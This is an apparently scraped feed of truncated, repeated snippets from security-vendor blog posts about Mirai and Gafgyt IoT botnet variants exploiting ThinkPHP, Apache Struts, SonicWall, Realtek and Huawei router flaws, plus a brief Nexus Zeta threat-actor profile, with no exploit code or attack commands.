blogs_trendmicro·2019-01-25
ThinkPHP Vulnerability Abused by Botnets
IoT
# ThinkPHP Vulnerability Abused by Botnets
We found a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai abusing a ThinkPHP flaw for propagation and DDoS attacks.
By: Augusto Remillano II
2019/01/25
Read time: ( words)
Save to Folio
Cybercriminals are exploiting a ThinkPHP vulnerability — one that was disclosed and patched in December 2018 — for botnet propagation by a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai. Cybercriminals use websites created using the PHP framework to breach web servers via dictionary attacks on default credentials and gain control of these routers for distributed denial of service attacks (DDoS). Our telemetry showed that these two particular malware types caused a sudden increase in attacks and infection attempts from January
Trendmicro
ThinkPHP Vulnerability Abused by Botnets
blogs_trendmicro·2019-01-25
ThinkPHP Vulnerability Abused by Botnets
IoT
## ThinkPHP Vulnerability Abused by Botnets
We found a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai abusing a ThinkPHP flaw for propagation and DDoS attacks.
By: Augusto Remillano II Jan 25, 2019 Read time: ( words)
Save to Folio
Cybercriminals are exploiting a ThinkPHP vulnerability — one that was disclosed and patched in December 2018 — for botnet propagation by a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai. Cybercriminals use websites created using the PHP framework to breach web servers via dictionary attacks on default credentials and gain control of these routers for distributed denial of service attacks ( DDoS ). Our telemetry showed that these two particular malware types caused a sudden increase in attacks and infection attempts from Jan
Trendmicro
Miori IoT Botnet Delivered via ThinkPH Exploit
blogs_trendmicro·2018-12-20
Miori IoT Botnet Delivered via ThinkPH Exploit
Malware
# Miori IoT Botnet Delivered via ThinkPH Exploit
We analyzed another Mirai variant called “Miori,” which is being spread through a Remote Code Execution (RCE) vulnerability in the PHP framework, ThinkPHP.
By: Augusto Remillano II, Mark Vicente
2018/12/20
Read time: ( words)
Save to Folio
The exploitation of vulnerabilities in smart devices has been a persistent problem for many internet of things (IoT) users. Perhaps the most infamous IoT threat is the constantly evolving Mirai malware, which has been used in many past campaigns that compromised devices with default or weak credentials. Different Mirai variants and derivatives have cropped up since its source code was leaked in 2016.
We analyzed another Mirai variant called “Miori,” which is being spread through a Remote Cod
Trendmicro
Miori IoT Botnet Delivered via ThinkPH Exploit
blogs_trendmicro·2018-12-20
Miori IoT Botnet Delivered via ThinkPH Exploit
Malware
## Miori IoT Botnet Delivered via ThinkPH Exploit
We analyzed another Mirai variant called “Miori,” which is being spread through a Remote Code Execution (RCE) vulnerability in the PHP framework, ThinkPHP.
By: Augusto Remillano II, Mark Vicente 2018/12/20 Read time: ( words)
Save to Folio
The exploitation of vulnerabilities in smart devices has been a persistent problem for many internet of things (IoT) users. Perhaps the most infamous IoT threat is the constantly evolving Mirai malware, which has been used in many past campaigns that compromised devices with default or weak credentials. Different Mirai variants and derivatives have cropped up since its source code was leaked in 2016.
We analyzed another Mirai variant called “Miori,” which is being spread through a Remote Cod
Trendmicro
Miori IoT Botnet Delivered via ThinkPH Exploit
blogs_trendmicro·2018-12-20
Miori IoT Botnet Delivered via ThinkPH Exploit
Malware
## Miori IoT Botnet Delivered via ThinkPH Exploit
We analyzed another Mirai variant called “Miori,” which is being spread through a Remote Code Execution (RCE) vulnerability in the PHP framework, ThinkPHP.
By: Augusto Remillano II, Mark Vicente Dec 20, 2018 Read time: ( words)
Save to Folio
The exploitation of vulnerabilities in smart devices has been a persistent problem for many internet of things (IoT) users. Perhaps the most infamous IoT threat is the constantly evolving Mirai malware, which has been used in many past campaigns that compromised devices with default or weak credentials. Different Mirai variants and derivatives have cropped up since its source code was leaked in 2016.
We analyzed another Mirai variant called “Miori,” which is being spread through a Remote C
Fortinet
DDoS-for-Hire Service Powered by Bushido Botnet
blogs_fortinet·2018-10-26
DDoS-for-Hire Service Powered by Bushido Botnet
FORTIGUARD LABS THREAT RESEARCH
DDoS-for-Hire Service Powered by Bushido Botnet
By Rommel Joven and Evgeny Ananin | October 26, 2018
Distributed Denial-of-Service (DDoS) service offerings, often disguised as legitimate “booter” or “stresser” services, continue to increase in the cyber underground market. This relatively new Crime-as-a-Service trend has created an entry point for novice DDoS attackers, offering a simple option to anonymously attack nearly any website and forcing it offline for a small fee.
Sadly, due to the public release of the source code of some popular bots, building a botnet to provide these services is simpler than ever. A quick Google search returns lists of resources for botnet builders, usually with complete step-by-step instructions. Being able to re-use and ev
Unit42
Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
blogs_unit42·2018-09-10·CVSS 9.8
CVE-2017-5638 [CRITICAL] Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
Threat Research Center
Threat Research
Malware
## Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
Ruchna Nigam
Published: September 9, 2018
Malware
Threat Research
Vulnerabilities
Apache Struts
BlackNurse
Botnet
CVE-2017-5638
CVE-2018-9866
Exploits
Gafgyt
IoT
Linux
Mirai
SonicWall RCE
Executive Summary:
Unit 42 has uncovered new variants of the well-known IoT botnets Mirai and Gafgyt. These are the IoT botnets associated with unprecedented Distributed Denial of Service attacks in November 2016 and since.
These variants are notable for two reasons:
The new Mirai version targets the same Apache Struts vulnerability associated with the Equifax data breach in 2017.
The new Gafgyt version targets a newly disclosed vulnerability affectin
Unit42
Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
blogs_unit42·2018-09-10·CVSS 9.8
[CRITICAL] Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
Executive Summary:
Unit 42 has uncovered new variants of the well-known IoT botnets Mirai and Gafgyt. These are the IoT botnets associated with unprecedented Distributed Denial of Service attacks in November 2016 and since.
These variants are notable for two reasons:
- The new Mirai version targets the same Apache Struts vulnerability associated with the Equifax data breach in 2017.
- The new Gafgyt version targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall’s Global Management System (GMS).
These developments suggest these IOT botnets are increasingly targeting enterprise devices with outdated versions.
All organizations should ensure they keep not only their systems up-to-date and patched, but also their IoT devices. For Palo Alto Networks cust
Unit42
Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns
blogs_unit42·2018-07-20·CVSS 9.8
[CRITICAL] Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns
The end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the Mirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices.
Samples belonging to these campaigns incorporate as many as eleven exploits within a single sample, beating the IoT Reaper malware, which borrowed some of the Mirai source code but also came with an integrated LUA environment that incorporated nine exploits in its code.
In their newest evolution, samples also target the D-Link DSL-2750B OS Command Injection vulnerability, only a few weeks after the publication of its Metasploit module on the 25th of May (even though the vulnerability has been public knowledge since February of 2016).
While exploring sa
Unit42
Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns
blogs_unit42·2018-07-20·CVSS 9.8
[CRITICAL] Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns
Threat Research Center
Threat Research
Malware
## Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns
Ruchna Nigam
Published: July 20, 2018
Malware
Threat Research
Botnet
DDoS
Exploits
Gafgyt
Hakai
IoT
Linux
Mirai
Okane
Omni
The end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the Mirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices.
Samples belonging to these campaigns incorporate as many as eleven exploits within a single sample, beating the IoT Reaper malware, which borrowed some of the Mirai source code but also came with an integrated LUA environment that incorporated nine exploits in its code.
In their newest evolution, samples
Fortinet
Satori Adds Known Exploit Chain to Enslave Wireless IP Cameras
blogs_fortinet·2018-02-02
Satori Adds Known Exploit Chain to Enslave Wireless IP Cameras
FORTIGUARD LABS THREAT RESEARCH
Satori Adds Known Exploit Chain to Enslave Wireless IP Cameras
By David Maciejak, Jasper Manuel and Rommel Joven | February 02, 2018
Satori, a Mirai based IoT bot, has been one of the most actively updated exploits in recent months. It is believed that the hacker behind this bot is also the author of other Mirai variants, known as Okiru, and Masuta.
FortiGuard Labs researchers recently observed a new Satori version that had added a known exploit chain (one which had been used in the past by the Persirai bot) to enable it to spread to vulnerable devices, particularly, wireless IP cameras that run a vulnerable custom version of the GoAhead web server. This exploit chain targets two vulnerabilities. One, discovered by Istvan Toth and which was detailed in th
Unit42
IoT Malware Evolves to Harvest Bots by Exploiting a Zero-day Home Router Vulnerability
blogs_unit42·2018-01-11·CVSS 9.8
CVE-2014-8361 [CRITICAL] IoT Malware Evolves to Harvest Bots by Exploiting a Zero-day Home Router Vulnerability
Summary
In early December 2017, 360 Netlab discovered a new malware family which they named Satori. Satori is a derivative of Mirai and exploits two vulnerabilities: CVE-2014-8361 a code execution vulnerability in the miniigd SOAP service in Realtek SDK, and CVE 2017-17215 a newly discovered vulnerability in Huawei’s HG532e home gateway patched in early December 2017.
Palo Alto Networks Unit 42 investigated Satori, and from our intelligence data, we have found there are three Satori variants. The first of these variants appeared in April 2017, eight months before these most recent attacks.
We also found evidence indicating that the version of Satori exploiting CVE 2017-17215 was active in late November 2017, before Huawei patched the vulnerability. This means that this version of Satori
Unit42
IoT Malware Evolves to Harvest Bots by Exploiting a Zero-day Home Router Vulnerability
blogs_unit42·2018-01-11·CVSS 9.8
CVE-2014-8361 [CRITICAL] IoT Malware Evolves to Harvest Bots by Exploiting a Zero-day Home Router Vulnerability
Threat Research Center
Threat Research
Vulnerabilities
## IoT Malware Evolves to Harvest Bots by Exploiting a Zero-day Home Router Vulnerability
Cong Zheng
Claud Xiao
Yanhui Jia
Published: January 11, 2018
Malware
Threat Research
Vulnerabilities
Botnet
IoT
Mirai
Satori
Zero-day
Summary
In early December 2017, 360 Netlab discovered a new malware family which they named Satori . Satori is a derivative of Mirai and exploits two vulnerabilities: CVE-2014-8361 a code execution vulnerability in the miniigd SOAP service in Realtek SDK, and CVE 2017-17215 a newly discovered vulnerability in Huawei’s HG532e home gateway patched in early December 2017.
Palo Alto Networks Unit 42 investigated Satori, and from our intelligence data, we have found there are three Satori variants. The
Checkpoint
Huawei Home Routers in Botnet Recruitment
blogs_checkpoint·2017-12-21·CVSS 8.8
CVE-2017-17215 [HIGH] Huawei Home Routers in Botnet Recruitment
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## Huawei Home Routers in Botnet Recruitment
A Zero-Day vulnerability (CVE-2017-17215) in the Huawei home router HG532 has been discovered by Check Point Researchers, and hundreds of thousand
Greynoiseio
NoiseLetter
blogs_greynoiseio
NoiseLetter
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
GreyNoise Intelligence Publishes Second Annual Retrospective to Help International Cybersecurity Community Defend Against Internet Exploitation
blogs_greynoiseio
GreyNoise Intelligence Publishes Second Annual Retrospective to Help International Cybersecurity Community Defend Against Internet Exploitation
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Threat Intel
Nexus Zeta
threat_intel
Nexus Zeta
# Threat Actor: Nexus Zeta
## Description
Nexus Zeta is no stranger when it comes to implementing SOAP related exploits. The threat actor has already been observed in implementing two other known SOAP related exploits, CVE-2014–8361 and CVE-2017–17215 in his Satori botnet project. A third SOAP exploit, TR-069 bug has also been observed previously in IoT botnets. This makes EDB 38722 the fourth SOAP related exploit which is discovered in the wild by IoT botnets.
## Associated Malware Families (1)
elf.masuta
2018-03-20
Published
Exploited in the wild